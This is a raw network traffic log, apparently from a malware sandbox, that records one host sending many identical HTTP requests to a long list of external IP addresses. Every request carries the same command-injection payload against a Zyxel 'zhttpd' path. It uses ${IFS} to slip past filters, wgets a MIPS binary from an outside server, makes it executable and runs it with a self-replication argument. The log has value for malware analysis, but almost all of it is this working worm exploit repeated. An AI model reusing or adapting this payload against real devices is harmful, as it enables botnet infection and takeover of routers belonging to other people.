                                      Jan 14, 2024 15:50:46.298563957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4285192.168.2.145344457.248.171.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298626900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4286192.168.2.145308491.229.21.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298686028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4287192.168.2.143996041.248.52.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298734903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4288192.168.2.145289674.8.251.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298799038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4289192.168.2.1448730182.201.12.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298871994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4290192.168.2.144710467.123.224.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298912048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4291192.168.2.1445738160.39.2.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298974991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4292192.168.2.1459720213.193.147.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299024105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4293192.168.2.144438024.180.172.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299088001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4294192.168.2.1439762199.150.229.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299169064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4295192.168.2.1440302181.181.172.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299190044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4296192.168.2.1456582178.231.241.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299258947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4297192.168.2.146085471.84.176.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299293995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4298192.168.2.1438268176.126.223.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299350977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4299192.168.2.1456986173.2.210.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299402952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4300192.168.2.1455334190.186.125.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299454927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4301192.168.2.1450266145.167.71.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299498081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4302192.168.2.1448342148.219.135.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299562931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4303192.168.2.143663882.56.181.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299621105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4304192.168.2.143811090.11.18.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299674988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4305192.168.2.1438170153.10.232.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299715042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4306192.168.2.1455598112.143.18.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299771070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4307192.168.2.1436316163.123.27.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299849987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4308192.168.2.1439332143.91.173.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299900055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4309192.168.2.143414045.126.63.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.299967051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4310192.168.2.1449738202.50.134.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300023079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4311192.168.2.1434072124.212.81.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300065041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4312192.168.2.144806877.45.81.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300121069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4313192.168.2.1442240141.252.38.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300190926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4314192.168.2.1453596195.122.51.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300245047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4315192.168.2.143676620.173.158.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300303936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4316192.168.2.1457382133.97.31.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300367117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4317192.168.2.1445330110.213.53.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300405025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4318192.168.2.1447424180.122.241.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300477028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4319192.168.2.1438108122.15.98.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300532103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4320192.168.2.145010253.163.10.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300580978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4321192.168.2.1440432211.173.74.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300616026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4322192.168.2.143980454.231.81.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300694942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4323192.168.2.1440088200.106.84.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300750017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4324192.168.2.143431053.238.77.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300812960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4325192.168.2.143688474.219.86.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300867081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4326192.168.2.1455760204.157.85.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300945044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4327192.168.2.1437114178.16.156.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.300995111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4328192.168.2.1442054154.167.235.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301074028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4329192.168.2.1445404144.41.140.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301125050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4330192.168.2.1442766174.226.170.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301181078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4331192.168.2.1454384162.238.33.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301249027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4332192.168.2.1451782199.93.199.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301301003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4333192.168.2.143469875.21.55.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301335096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4334192.168.2.1444246199.224.96.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301407099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4335192.168.2.143430894.91.223.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301466942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4336192.168.2.143718613.125.70.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301510096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4337192.168.2.1457218120.255.152.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301552057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4338192.168.2.1441516176.109.113.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301615953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4339192.168.2.145676213.204.93.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301676035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4340192.168.2.1445460116.78.156.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301733971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4341192.168.2.1448100199.46.134.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301794052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4342192.168.2.1454968122.112.124.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301856995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4343192.168.2.145390866.47.98.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301923037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4344192.168.2.144782292.209.40.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.301970959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4345192.168.2.143716268.124.253.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302022934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4346192.168.2.1454838162.84.189.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302103043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4347192.168.2.144930264.189.159.133443
                                      TimestampBytes transferredDirectionData
